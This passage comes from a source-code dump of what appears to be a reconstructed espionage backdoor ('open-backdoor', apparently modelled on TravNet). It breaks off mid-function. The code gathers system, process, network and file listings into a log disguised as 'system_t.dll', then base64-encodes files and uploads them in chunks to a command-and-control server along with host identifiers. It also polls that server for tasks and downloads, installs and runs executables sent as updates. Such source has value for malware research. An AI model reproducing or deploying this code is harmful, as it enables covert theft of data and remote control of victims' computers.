Memory:%dMB (for%.2f%s)", 346 | memStatus.dwTotalPhys >> 20, 347 | memStatus.dwAvailPhys >> 20, 348 | v0, // To check this part 349 | "%" // Noobs, it's enough to use %% for the percentage symbol 350 | ); 351 | 352 | g_szPHMemory[0] = 0; 353 | strcpy(g_szPHMemory, szPHMemory); 354 | 355 | strcat(szLog, g_szPHMemory); 356 | strcat(szLog, "\r\n"); 357 | 358 | FILE *f = fopen(szSystem_T, "wb"); 359 | if (NULL == f) 360 | return false; 361 | 362 | fwrite(szLog, 1, strlen(szLog), f); 363 | fclose(f); 364 | 365 | return true; 366 | } 367 | 368 | BOOL GetProcessList() 369 | { 370 | CHAR szSysDir[MAX_PATH]; 371 | GetSystemDirectory(szSysDir, MAX_PATH); 372 | 373 | CHAR szSystem_T[MAX_PATH]; 374 | sprintf(szSystem_T, "%s\\system_t.dll", szSysDir); 375 | 376 | __tfnCreateToolhelp32Snapshot lpfnCreateToolhelp32Snapshot = (__tfnCreateToolhelp32Snapshot)GetProcAddress( 377 | LoadLibrary("kernel32.dll"), 378 | "CreateToolhelp32Snapshot" 379 | ); 380 | 381 | HANDLE hSnapshot = lpfnCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 382 | if (NULL == hSnapshot) 383 | return FALSE; 384 | 385 | PROCESSENTRY32 pe; 386 | pe.dwSize = sizeof(PROCESSENTRY32); 387 | 388 | char szLog[260]; 389 | sprintf(szLog, "\r\n[Processlist]\r\n"); 390 | 391 | FILE *f1 = fopen(szSystem_T, "ab"); 392 | if (NULL == f1) 393 | return FALSE; 394 | 395 | fwrite(szLog, 1, strlen(szLog), f1); 396 | fclose(f1); 397 | 398 | for (BOOL i = Process32First(hSnapshot, &pe); i; i = Process32Next(hSnapshot, &pe)) 399 | { 400 | memset(szLog, 0, 260); 401 | sprintf(szLog, "%4d %s\r\n", pe.th32ProcessID, pe.szExeFile); 402 | 403 | FILE *f = fopen(szSystem_T, "ab"); 404 | if (NULL == f) 405 | return FALSE; 406 | 407 | fwrite(szLog, 1, strlen(szLog), f); 408 | fclose(f); 409 | } 410 | 411 | CloseHandle(hSnapshot); 412 | return TRUE; 413 | } 414 | 415 | void GetNetworkInfo() 416 | { 417 | CHAR szCMDLine[] = "ipconfig /all"; 418 | 419 | CHAR szSysDir[MAX_PATH]; 420 | GetSystemDirectory(szSysDir, MAX_PATH); 421 | 422 | CHAR szFileSystem_T[MAX_PATH]; 423 | sprintf(szFileSystem_T, "%s\\system_t.dll", szSysDir); 424 | 425 | SECURITY_ATTRIBUTES PipeAttributes; 426 | PipeAttributes.nLength = sizeof(SECURITY_ATTRIBUTES); 427 | PipeAttributes.lpSecurityDescriptor = NULL; 428 | PipeAttributes.bInheritHandle = TRUE; 429 | 430 | HANDLE hObject; 431 | HANDLE hFile; 432 | if (FALSE == CreatePipe(&hFile, &hObject, &PipeAttributes, 0)) 433 | return; 434 | 435 | STARTUPINFO StartupInfo; 436 | 437 | StartupInfo.cb = sizeof(STARTUPINFO); 438 | GetStartupInfo(&StartupInfo); 439 | 440 | StartupInfo.wShowWindow = 0; 441 | StartupInfo.hStdError = hObject; 442 | StartupInfo.hStdOutput = hObject; 443 | StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 444 | 445 | PROCESS_INFORMATION ProcessInformation; 446 | if (TRUE == CreateProcess(NULL, szCMDLine, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInformation)) 447 | { 448 | #ifndef NO_PATCH 449 | WaitForSingleObject(ProcessInformation.hProcess, 10000); 450 | #else // NO_PATCH 451 | // If output of ipconfig > 4000 bytes the virus enter in an infinite loop 452 | WaitForSingleObject(ProcessInformation.hProcess, INFINITE); 453 | #endif // NO_PATCH 454 | CloseHandle(hObject); 455 | 456 | DWORD NumberOfBytesRead = 0; 457 | char szData[0x2800] = {}; 458 | if (ReadFile(hFile, szData, 0x2800, &NumberOfBytesRead, 0)) 459 | { 460 | HANDLE hFileLog = CreateFile(szFileSystem_T, GENERIC_WRITE, 3, NULL, 4, FILE_ATTRIBUTE_NORMAL, NULL); 461 | SetFilePointer(hFileLog, 0, NULL, 2); 462 | 463 | DWORD NumberOfBytesWritten = 0; 464 | WriteFile(hFileLog, "\r\n\r\n", 5, &NumberOfBytesWritten, 0); 465 | 466 | NumberOfBytesWritten = 0; 467 | WriteFile(hFileLog, szData, 0x2800, &NumberOfBytesWritten, 0); 468 | 469 | CloseHandle(hFileLog); 470 | } 471 | 472 | #ifdef NO_PATCH 473 | CloseHandle(hObject); // File handle has been already closed 474 | #endif // NO_PATCH 475 | CloseHandle(ProcessInformation.hProcess); 476 | CloseHandle(ProcessInformation.hThread); 477 | CloseHandle(hFile); 478 | } 479 | } 480 | 481 | void WriteLog(LPCVOID lpBuffer, DWORD dwSize) 482 | { 483 | HANDLE hFile = CreateFile(g_szModuleLogName, 484 | GENERIC_WRITE, 485 | FILE_SHARE_READ | FILE_SHARE_WRITE, 486 | NULL, 487 | OPEN_ALWAYS, 488 | FILE_ATTRIBUTE_NORMAL, 489 | NULL 490 | ); 491 | 492 | SetFilePointer(hFile, 0, NULL, FILE_END); 493 | 494 | DWORD dwWritten = 0; 495 | WriteFile(hFile, lpBuffer, dwSize, &dwWritten, NULL); 496 | 497 | CloseHandle(hFile); 498 | } 499 | 500 | void GetProgramFilesEx(const char *lpszProgramFiles) 501 | { 502 | char szProgramFilesList[260]; 503 | sprintf(szProgramFilesList, "%s*.*", lpszProgramFiles); 504 | 505 | WIN32_FIND_DATA FindFileData; 506 | HANDLE hFindFile = FindFirstFile(szProgramFilesList, &FindFileData); 507 | if (INVALID_HANDLE_VALUE == hFindFile) 508 | return; 509 | 510 | do 511 | { 512 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 513 | { 514 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 515 | { 516 | LOG(FindFileData.cFileName); 517 | LOG("\\\r\n"); 518 | } 519 | else 520 | { 521 | LOG(FindFileData.cFileName); 522 | LOG("\r\n"); 523 | } 524 | } 525 | } 526 | while (FindNextFile(hFindFile, &FindFileData)); 527 | 528 | FindClose(hFindFile); 529 | } 530 | 531 | void Setup_() 532 | { 533 | CHAR szModuleName[260] = {}; 534 | GetModuleFileName(NULL, szModuleName, 260); 535 | 536 | strcpy(g_szModuleLogName, szModuleName); 537 | strcpy(strrchr(g_szModuleLogName, '.'), ".log"); 538 | 539 | sprintf(g_szTestURL, "%s", "http://www.microsoft.com/info/privacy_security.htm"); 540 | } -------------------------------------------------------------------------------- /open-backdoor/c2.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "c2.hpp" 6 | 7 | #include 8 | #include 9 | #include 10 | #include "StdAfx.hpp" 11 | #include "debug.hpp" 12 | #include "3rd-party\base64.h" 13 | 14 | #ifndef NO_HASH_MD5 15 | #include "md5++.hpp" 16 | #endif 17 | 18 | BOOL SendFileToC2(LPCSTR lpszFileToSend, const char *lpszSendName) 19 | { 20 | // ====================== READ FILE ====================== 21 | HANDLE hFile = CreateFile(lpszFileToSend, GENERIC_READ, 1, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 22 | if (INVALID_HANDLE_VALUE == hFile) 23 | return 0; 24 | 25 | DWORD dwFileSize = GetFileSize(hFile, 0); 26 | char *lpFileBuf = (char *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize); 27 | 28 | DWORD dwRead = 0; 29 | if (FALSE == ReadFile(hFile, lpFileBuf, dwFileSize, &dwRead, 0)) 30 | { 31 | HeapFree(GetProcessHeap(), 0, lpFileBuf); 32 | CloseHandle(hFile); 33 | 34 | return FALSE; 35 | } 36 | 37 | if (dwRead <= 0) 38 | { 39 | HeapFree(GetProcessHeap(), 0, lpFileBuf); 40 | CloseHandle(hFile); 41 | 42 | return FALSE; 43 | } 44 | 45 | // ====================== ENCODE FILE DATA ====================== 46 | #ifndef NO_CUSTOM_BASE64_ENCODING 47 | int nEncSize = 0; 48 | LPVOID lpEncBuf = sub_10007E5C(lpFileBuf, dwFileSize, &nEncSize); 49 | 50 | char szEnd[8] = "::end"; 51 | int v7 = (4 * ((nEncSize + 2) / 3)) + 12; 52 | 53 | char *szBufEncoded = (char *)HeapAlloc(GetProcessHeap(), 8, v7); 54 | 55 | strcpy(szBufEncoded, "begin::"); 56 | int nBufSize = sub_10001072(lpEncBuf, nEncSize, szBufEncoded + 7, v7 - 12); 57 | memcpy(&szBufEncoded[nBufSize + 7], szEnd, 5); 58 | #else // !NO_CUSTOM_BASE64_ENCODING 59 | char szEnd[8] = "::end"; 60 | int nBase64Len = Base64encode_len(dwFileSize) + 12; 61 | 62 | char *szBufEncoded = (char *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nBase64Len); 63 | 64 | strcpy(szBufEncoded, "begin::"); 65 | int nBufSize = Base64encode(szBufEncoded + 7, lpFileBuf, dwFileSize) - 1; 66 | memcpy(&szBufEncoded[nBufSize + 7], szEnd, 5); 67 | #endif // !NO_CUSTOM_BASE64_ENCODING 68 | 69 | // ====================== TOKENIZE FILE DATA ====================== 70 | BOOL bRet = FALSE; 71 | 72 | DWORD nNextTokenPtr = 0; 73 | int nTotalSize = nBufSize + 12; 74 | for (int k = 0; k < nTotalSize; k += 1024) 75 | { 76 | int nRetries; 77 | if ((signed int)(nTotalSize - k) < 1024) 78 | { 79 | nRetries = 0; 80 | while (1) 81 | { 82 | bRet = SendFileTokenToC2(&szBufEncoded[k], nTotalSize - k, lpszSendName, k, &nNextTokenPtr); 83 | if (TRUE == bRet) 84 | break; 85 | 86 | if (++nRetries >= 3) 87 | goto END; 88 | } 89 | g_nSentData += nTotalSize - k; 90 | 91 | if (nTotalSize != nNextTokenPtr) 92 | k = nNextTokenPtr - (nNextTokenPtr % 1024) - 1024; 93 | } 94 | else 95 | { 96 | nRetries = 0; 97 | while (1) 98 | { 99 | bRet = SendFileTokenToC2(&szBufEncoded[k], 1024, lpszSendName, k, &nNextTokenPtr); 100 | if (TRUE == bRet) 101 | break; 102 | 103 | if (++nRetries >= 3) 104 | goto END; 105 | } 106 | g_nSentData += 1024; 107 | 108 | if (k + 1024 != nNextTokenPtr) 109 | k = nNextTokenPtr - (nNextTokenPtr % 1024) - 1024; 110 | } 111 | 112 | if (g_nUploadRate > 0) 113 | { 114 | DWORD dwTick = GetTickCount(); 115 | DWORD v15 = (dwTick < g_dwLastTickCount) ? (dwTick - g_dwLastTickCount - 1) : (dwTick - g_dwLastTickCount); 116 | if (v15 > 10000) 117 | { 118 | if (g_nSentData > g_nUploadRate * ((v15 / 1000) + 5) << 10) 119 | Sleep(5000); 120 | 121 | g_nSentData = 0; 122 | g_dwLastTickCount = GetTickCount(); 123 | } 124 | } 125 | } 126 | 127 | END: 128 | HeapFree(GetProcessHeap(), 0, szBufEncoded); 129 | #ifndef NO_CUSTOM_BASE64_ENCODING 130 | HeapFree(GetProcessHeap(), 0, lpEncBuf); 131 | #endif // !NO_CUSTOM_BASE64_ENCODING 132 | HeapFree(GetProcessHeap(), 0, lpFileBuf); 133 | 134 | CloseHandle(hFile); 135 | 136 | return bRet; 137 | } 138 | 139 | BOOL SendFileTokenToC2(const char *lpszFileText, int nFileTextLen, const char *lpszFileName, DWORD dwFileStart, DWORD *dwRetSize) 140 | { 141 | INTERNET_PROXY_INFO lpProxy = {}; 142 | 143 | char szHostName[MAX_PATH]; 144 | char szExtraInfo[MAX_PATH]; 145 | char szScheme[MAX_PATH]; 146 | char szUrlPath[MAX_PATH]; 147 | 148 | URL_COMPONENTS UrlComponents = {}; 149 | 150 | UrlComponents.lpszScheme = szScheme; 151 | UrlComponents.dwSchemeLength = MAX_PATH; 152 | UrlComponents.lpszHostName = szHostName; 153 | UrlComponents.dwHostNameLength = MAX_PATH; 154 | UrlComponents.lpszUrlPath = szUrlPath; 155 | UrlComponents.dwUrlPathLength = MAX_PATH; 156 | UrlComponents.lpszExtraInfo = szExtraInfo; 157 | UrlComponents.dwExtraInfoLength = MAX_PATH; 158 | 159 | UrlComponents.dwStructSize = sizeof(URL_COMPONENTS); 160 | 161 | Sleep(1); 162 | if (NULL == InternetCrackUrl(g_szWebPage, 0, 0, &UrlComponents)) 163 | return FALSE; 164 | 165 | Sleep(1); 166 | char *lpszURL = (char *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nFileTextLen + 1024); 167 | 168 | sprintf(lpszURL, "%s?hostid=", UrlComponents.lpszUrlPath); 169 | strcat(lpszURL, g_szVolumeSerialNr); 170 | strcat(lpszURL, "&hostname="); 171 | strcat(lpszURL, g_szHostname); 172 | strcat(lpszURL, "&hostip="); 173 | strcat(lpszURL, g_szHostByName); 174 | strcat(lpszURL, "&filename="); 175 | strcat(lpszURL, lpszFileName); 176 | strcat(lpszURL, "&filestart="); 177 | 178 | #ifndef NO_PATCH 179 | CHAR szFileStart[16]; 180 | #else // NO_PATCH 181 | CHAR szFileStart[4]; // 4 bytes will result in memory corruption 182 | #endif // NO_PATCH 183 | sprintf(szFileStart, "%u", dwFileStart); 184 | strcat(lpszURL, szFileStart); 185 | strcat(lpszURL, "&filetext="); 186 | 187 | memcpy(&lpszURL[strlen(lpszURL)], lpszFileText, nFileTextLen); 188 | 189 | CHAR szHeaders[1024]; 190 | sprintf(szHeaders, 191 | "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" 192 | "Accept-Language: en-us\r\n" 193 | "Proxy-Connection: Keep-Alive\r\n" 194 | "Pragma: no-cache" 195 | ); 196 | 197 | HINTERNET hInternet = InternetOpen("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", (g_bUseProxy ? 0 : 1), 0, 0, 0); 198 | if (NULL == hInternet) 199 | { 200 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpszURL); 201 | return FALSE; 202 | } 203 | 204 | if (TRUE == g_bUseProxy) 205 | { 206 | CHAR szProxy[MAX_PATH]; 207 | CHAR szProxyBypass[MAX_PATH]; 208 | 209 | sprintf(szProxy, "%s:%s", g_nProxy_IP, g_nProxy_PORT); 210 | sprintf(szProxyBypass, "%s:%s", g_nProxy_IP, g_nProxy_PORT); 211 | 212 | lpProxy.lpszProxy = szProxy; 213 | lpProxy.lpszProxyBypass = szProxyBypass; 214 | lpProxy.dwAccessType = INTERNET_OPEN_TYPE_PROXY; 215 | 216 | InternetSetOption(hInternet, INTERNET_OPTION_PROXY, &lpProxy, sizeof(INTERNET_PROXY_INFO)); 217 | } 218 | 219 | HINTERNET hConnect = InternetConnect(hInternet, UrlComponents.lpszHostName, UrlComponents.nPort, 0, 0, 3, 0, 0); 220 | if (NULL == hConnect) 221 | { 222 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpszURL); 223 | InternetCloseHandle(hInternet); 224 | 225 | return FALSE; 226 | } 227 | 228 | if (TRUE == g_bUseProxy) 229 | { 230 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_USERNAME, g_nProxy_USER, strlen(g_nProxy_USER) + 1); 231 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_PASSWORD, g_nProxy_PSW, strlen(g_nProxy_PSW) + 1); 232 | } 233 | 234 | HINTERNET hRequest = HttpOpenRequest(hConnect, 235 | "GET", 236 | lpszURL, 237 | NULL, 238 | NULL, 239 | NULL, 240 | INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 241 | NULL 242 | ); 243 | if (NULL == hRequest) 244 | { 245 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpszURL); 246 | 247 | InternetCloseHandle(hConnect); 248 | InternetCloseHandle(hInternet); 249 | 250 | return FALSE; 251 | } 252 | 253 | DWORD dwTimeout = 60000; 254 | 255 | InternetSetOption(hRequest, INTERNET_OPTION_CONNECT_TIMEOUT, &dwTimeout, sizeof(DWORD)); 256 | InternetSetOption(hRequest, INTERNET_OPTION_SEND_TIMEOUT, &dwTimeout, sizeof(DWORD)); 257 | InternetSetOption(hRequest, INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT, &dwTimeout, sizeof(DWORD)); 258 | 259 | BOOL bReqRet = HttpSendRequest(hRequest, szHeaders, strlen(szHeaders), 0, 0); 260 | 261 | DWORD dwStatusCode; 262 | DWORD dwBufferLength = sizeof(DWORD); 263 | BOOL bRet = HttpQueryInfo(hRequest, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE, &dwStatusCode, &dwBufferLength, 0); 264 | if (FALSE == bRet || 200 != dwStatusCode) 265 | { 266 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpszURL); 267 | 268 | InternetCloseHandle(hRequest); 269 | InternetCloseHandle(hConnect); 270 | InternetCloseHandle(hInternet); 271 | 272 | return FALSE; 273 | } 274 | 275 | DWORD dwBufSize = 1024; 276 | CHAR szRetBuf[1024] = {}; 277 | bRet = InternetReadFile(hRequest, szRetBuf, 1024, &dwBufSize); 278 | if (TRUE == bRet) 279 | { 280 | if (_strnicmp(szRetBuf, "Success:", strlen("Success:"))) 281 | { 282 | bRet = FALSE; 283 | } 284 | else 285 | { 286 | CHAR szRetSize[16]; 287 | 288 | sprintf(szRetSize, "%s", &szRetBuf[strlen("Success:")]); 289 | *dwRetSize = atoi(szRetSize); 290 | } 291 | } 292 | 293 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpszURL); 294 | 295 | InternetCloseHandle(hRequest); 296 | InternetCloseHandle(hConnect); 297 | InternetCloseHandle(hInternet); 298 | 299 | return bRet; 300 | } 301 | 302 | int GetTaskFromC2() 303 | { 304 | // ======================== GET TASKS FROM C2 ======================== 305 | CHAR szURL[MAX_PATH]; 306 | sprintf(szURL, "%s", g_szWebPage); 307 | strcat(szURL, "?action=getdata"); 308 | 309 | DWORD dwGetSize = 0; 310 | char *lpGetMem = (char *)GetFromURL(szURL, &dwGetSize); 311 | if (NULL == lpGetMem) 312 | return TASK_INVALID; // 0 313 | 314 | Sleep(10); 315 | 316 | // ======================== SEARCH MY TASK ======================== 317 | CHAR szSearch[MAX_PATH]; 318 | char *lpMem = _strupr(lpGetMem); 319 | 320 | // ------------------------ UNINSTALL ------------------------ 321 | sprintf(szSearch, "%s", g_szVolumeSerialNr); 322 | strcat(szSearch, ":UNINSTALL"); 323 | Sleep(10); 324 | if (strstr(lpMem, szSearch)) 325 | { 326 | Sleep(10); 327 | HeapFree(GetProcessHeap(), 0, lpMem); 328 | return TASK_UNINSTALL; // 1 329 | } 330 | 331 | // ------------------------ UPDATE ------------------------ 332 | sprintf(szSearch, "%s:UPDATE", g_szVolumeSerialNr); 333 | Sleep(10); 334 | if (strstr(lpMem, szSearch)) 335 | { 336 | Sleep(10); 337 | HeapFree(GetProcessHeap(), 0, lpMem); 338 | return TASK_UPDATE; // 2 339 | } 340 | 341 | // ------------------------ RESET ------------------------ 342 | sprintf(szSearch, "%s:RESET", g_szVolumeSerialNr); 343 | if (strstr(lpMem, szSearch)) 344 | { 345 | Sleep(10); 346 | HeapFree(GetProcessHeap(), 0, lpMem); 347 | return TASK_RESET; // 3 348 | } 349 | 350 | // ------------------------ UPLOAD ------------------------ 351 | sprintf(szSearch, "%s", g_szVolumeSerialNr); 352 | strcat(szSearch, ":UPLOAD"); 353 | if (strstr(lpMem, szSearch)) 354 | { 355 | Sleep(10); 356 | HeapFree(GetProcessHeap(), 0, lpMem); 357 | return TASK_UPLOAD; // 4 358 | } 359 | 360 | // ------------------------ TASK UNKNOWN ------------------------ 361 | Sleep(10); 362 | 363 | HeapFree(GetProcessHeap(), 0, lpMem); 364 | PRINTDBG("%s: No valid task found.\n", __FUNCTION__); 365 | return TASK_INVALID; // 0 366 | } 367 | 368 | BOOL TaskUpdate() 369 | { 370 | CHAR szURL[MAX_PATH]; 371 | sprintf(szURL, "%s?action=datasize", g_szWebPage); 372 | 373 | DWORD dwSize = 0; 374 | char *lpMem = (char *)GetFromURL(szURL, &dwSize); 375 | if (NULL == lpMem) 376 | return FALSE; 377 | 378 | DWORD dwExeSize = 0; 379 | if (!_strnicmp(lpMem, "Success:", strlen("Success:"))) 380 | { 381 | CHAR szExeSize[16]; // unknown size 382 | 383 | sprintf(szExeSize, "%s", &lpMem[strlen("Success:")]); 384 | dwExeSize = atoi(szExeSize); 385 | } 386 | 387 | HeapFree(GetProcessHeap(), 0, lpMem); 388 | if (0 == dwExeSize) 389 | { 390 | PRINTDBG("No update available.\n"); 391 | return FALSE; 392 | } 393 | 394 | PRINTDBG("Update available found (%d bytes)!\n", dwExeSize); 395 | sprintf(szURL, g_szWebPage); 396 | char *lpszLastSlash = strrchr(szURL, '/'); 397 | if (NULL == lpszLastSlash) 398 | return FALSE; 399 | 400 | sprintf(lpszLastSlash + 1, "../" TRAVNET_UPDATE_FILE_NAME_REMOTE); 401 | char *lpExe = (char *)GetFromURL(szURL, &dwSize); 402 | lpMem = lpExe; 403 | 404 | if (NULL == lpExe) 405 | return FALSE; 406 | 407 | DWORD dwPointerPE = 0; 408 | WORD wHeaderMZ = 0; 409 | WORD wHeaderPE = 0; 410 | 411 | memcpy(&dwPointerPE, lpExe + 60, sizeof(DWORD)); 412 | memcpy(&wHeaderMZ, lpExe, sizeof(WORD)); 413 | memcpy(&wHeaderPE, lpExe + dwPointerPE, sizeof(WORD)); 414 | 415 | if (wHeaderMZ != 0x5A4D || wHeaderPE != 0x4550 || dwExeSize != dwSize) 416 | { 417 | HeapFree(GetProcessHeap(), 0, lpExe); 418 | return FALSE; 419 | } 420 | 421 | CHAR szInstallPath[MAX_PATH]; 422 | GetWindowsDirectory(szInstallPath, MAX_PATH); 423 | lstrcat(szInstallPath, "\\" TRAVNET_UPDATE_FILE_NAME_LOCAL); 424 | 425 | PRINTDBG("Installing update to %s\n", szInstallPath); 426 | HANDLE hFile = CreateFile(szInstallPath, 0x40000000u, 0, 0, 2u, 2u, 0); 427 | if (INVALID_HANDLE_VALUE == hFile) 428 | { 429 | HeapFree(GetProcessHeap(), 0, lpExe); 430 | PRINTDBG("Installation failed with code %d.\n", GetLastError()); 431 | return FALSE; 432 | } 433 | 434 | DWORD dwWritten; 435 | WriteFile(hFile, lpExe, dwSize, &dwWritten, NULL); 436 | CloseHandle(hFile); 437 | 438 | PROCESS_INFORMATION procInfo = {}; 439 | STARTUPINFO startInfo = {}; 440 | 441 | startInfo.dwFlags = STARTF_USESHOWWINDOW; 442 | startInfo.wShowWindow = SW_SHOWNORMAL; 443 | startInfo.cb = sizeof(STARTUPINFO); 444 | 445 | PRINTDBG("Launching update process.\n"); 446 | CreateProcess(0, szInstallPath, 0, 0, 0, 0, 0, 0, &startInfo, &procInfo); 447 | 448 | CloseHandle(procInfo.hProcess); 449 | CloseHandle(procInfo.hThread); 450 | 451 | HeapFree(GetProcessHeap(), 0, lpExe); 452 | 453 | sprintf(szURL, "%s", g_szWebPage); 454 | strcat(szURL, "?action=updated&hostid="); 455 | strcat(szURL, g_szVolumeSerialNr); 456 | 457 | lpMem = (char *)GetFromURL(szURL, &dwSize); 458 | // CloseHandle(hFile); // file has already been closed 459 | 460 | Sleep(10000); 461 | DeleteFile(szInstallPath); 462 | 463 | HeapFree(GetProcessHeap(), 0, lpMem); 464 | PRINTDBG("Update has been successfully installed.\n"); 465 | return TRUE; 466 | } 467 | 468 | LPVOID GetFromURL(LPCSTR szURL, DWORD *lpdwMemLength) 469 | { 470 | INTERNET_PROXY_INFO lpProxy = {}; 471 | 472 | char szHostName[MAX_PATH]; 473 | char szExtraInfo[MAX_PATH]; 474 | char szScheme[MAX_PATH]; 475 | char szUrlPath[MAX_PATH]; 476 | 477 | URL_COMPONENTS UrlComponents = {}; 478 | 479 | UrlComponents.lpszScheme = szScheme; 480 | UrlComponents.dwSchemeLength = MAX_PATH; 481 | UrlComponents.lpszHostName = szHostName; 482 | UrlComponents.dwHostNameLength = MAX_PATH; 483 | UrlComponents.lpszUrlPath = szUrlPath; 484 | UrlComponents.dwUrlPathLength = MAX_PATH; 485 | UrlComponents.lpszExtraInfo = szExtraInfo; 486 | UrlComponents.dwExtraInfoLength = MAX_PATH; 487 | 488 | UrlComponents.dwStructSize = sizeof(URL_COMPONENTS); 489 | 490 | if (NULL == InternetCrackUrl(szURL, 0, 0, &UrlComponents)) 491 | return NULL; 492 | 493 | CHAR szHeaders[1024]; 494 | sprintf(szHeaders, 495 | "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" 496 | "Accept-Language: en-us\r\n" 497 | "Proxy-Connection: Keep-Alive\r\n" 498 | "Pragma: no-cache" 499 | ); 500 | 501 | CHAR szAgent[256]; 502 | sprintf(szAgent, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 503 | 504 | HINTERNET hInternet; 505 | if (TRUE == g_bUseProxy) 506 | { 507 | Sleep(1); 508 | hInternet = InternetOpen(szAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 509 | } 510 | else 511 | { 512 | hInternet = InternetOpen(szAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 513 | } 514 | 515 | if (NULL == hInternet) 516 | return NULL; 517 | 518 | if (TRUE == g_bUseProxy) 519 | { 520 | CHAR szProxy[MAX_PATH]; 521 | CHAR szProxyBypass[MAX_PATH]; 522 | 523 | sprintf(szProxy, "%s:%s", g_nProxy_IP, g_nProxy_PORT); 524 | sprintf(szProxyBypass, "%s:%s", g_nProxy_IP, g_nProxy_PORT); 525 | 526 | lpProxy.lpszProxy = szProxy; 527 | lpProxy.lpszProxyBypass = szProxyBypass; 528 | lpProxy.dwAccessType = INTERNET_OPEN_TYPE_PROXY; 529 | 530 | InternetSetOption(hInternet, INTERNET_OPTION_PROXY, &lpProxy, sizeof(INTERNET_PROXY_INFO)); 531 | } 532 | 533 | HINTERNET hConnect = InternetConnect(hInternet, UrlComponents.lpszHostName, UrlComponents.nPort, 0, 0, 3, 0, 0); 534 | if (NULL == hConnect) 535 | { 536 | InternetCloseHandle(hInternet); 537 | return NULL; 538 | } 539 | 540 | if (TRUE == g_bUseProxy) 541 | { 542 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_USERNAME, g_nProxy_USER, strlen(g_nProxy_USER) + 1); 543 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_PASSWORD, g_nProxy_PSW, strlen(g_nProxy_PSW) + 1); 544 | } 545 | 546 | CHAR szObjectName[MAX_PATH]; 547 | sprintf(szObjectName, "%s%s", UrlComponents.lpszUrlPath, UrlComponents.lpszExtraInfo); 548 | 549 | HINTERNET hRequest = HttpOpenRequest(hConnect, 550 | "GET", 551 | szObjectName, 552 | NULL, 553 | NULL, 554 | NULL, 555 | INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 556 | NULL 557 | ); 558 | if (NULL == hRequest) 559 | { 560 | InternetCloseHandle(hConnect); 561 | InternetCloseHandle(hInternet); 562 | 563 | return NULL; 564 | } 565 | 566 | DWORD dwTimeout = 60000; 567 | 568 | InternetSetOption(hRequest, INTERNET_OPTION_CONNECT_TIMEOUT, &dwTimeout, sizeof(DWORD)); 569 | InternetSetOption(hRequest, INTERNET_OPTION_SEND_TIMEOUT, &dwTimeout, sizeof(DWORD)); 570 | InternetSetOption(hRequest, INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT, &dwTimeout, sizeof(DWORD)); 571 | 572 | BOOL bReqRet = HttpSendRequest(hRequest, szHeaders, strlen(szHeaders), 0, 0); 573 | 574 | DWORD dwStatusCode; 575 | DWORD dwBufferLength = sizeof(DWORD); 576 | BOOL bRet = HttpQueryInfo(hRequest, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE, &dwStatusCode, &dwBufferLength, 0); 577 | if (FALSE == bRet || 200 != dwStatusCode) 578 | { 579 | InternetCloseHandle(hRequest); 580 | InternetCloseHandle(hConnect); 581 | InternetCloseHandle(hInternet); 582 | 583 | return NULL; 584 | } 585 | 586 | LPVOID lpMem = NULL; 587 | DWORD dwReadSize = 0; 588 | while (1) 589 | { 590 | if (NULL != lpMem) 591 | { 592 | if (HeapSize(GetProcessHeap(), 0, lpMem) - dwReadSize < 0x2000) 593 | { 594 | LPVOID lpNewMem = HeapReAlloc(GetProcessHeap(), 8, lpMem, HeapSize(GetProcessHeap(), 0, lpMem) + 0x2000); 595 | if (NULL == lpNewMem) 596 | break; 597 | 598 | lpMem = lpNewMem; 599 | } 600 | } 601 | else 602 | { 603 | lpMem = HeapAlloc(GetProcessHeap(), 8, 0x2000); 604 | if (NULL == lpMem) 605 | goto END; 606 | } 607 | 608 | DWORD dwRead = 0; 609 | if (FALSE == InternetReadFile(hRequest, ((char *)lpMem) + dwReadSize, 0x2000, &dwRead)) 610 | break; 611 | 612 | if (0 == dwRead) 613 | goto END; 614 | 615 | dwReadSize += dwRead; 616 | *lpdwMemLength = dwReadSize; 617 | } 618 | 619 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpMem); 620 | lpMem = NULL; 621 | 622 | END: 623 | InternetCloseHandle(hRequest); 624 | InternetCloseHandle(hConnect); 625 | InternetCloseHandle(hInternet); 626 | 627 | return lpMem; 628 | } 629 | 630 | BOOL GetCMDFromC2() 631 | { 632 | DWORD dwGetSize = 0; 633 | 634 | CHAR szGetURL[MAX_PATH]; 635 | sprintf(szGetURL, 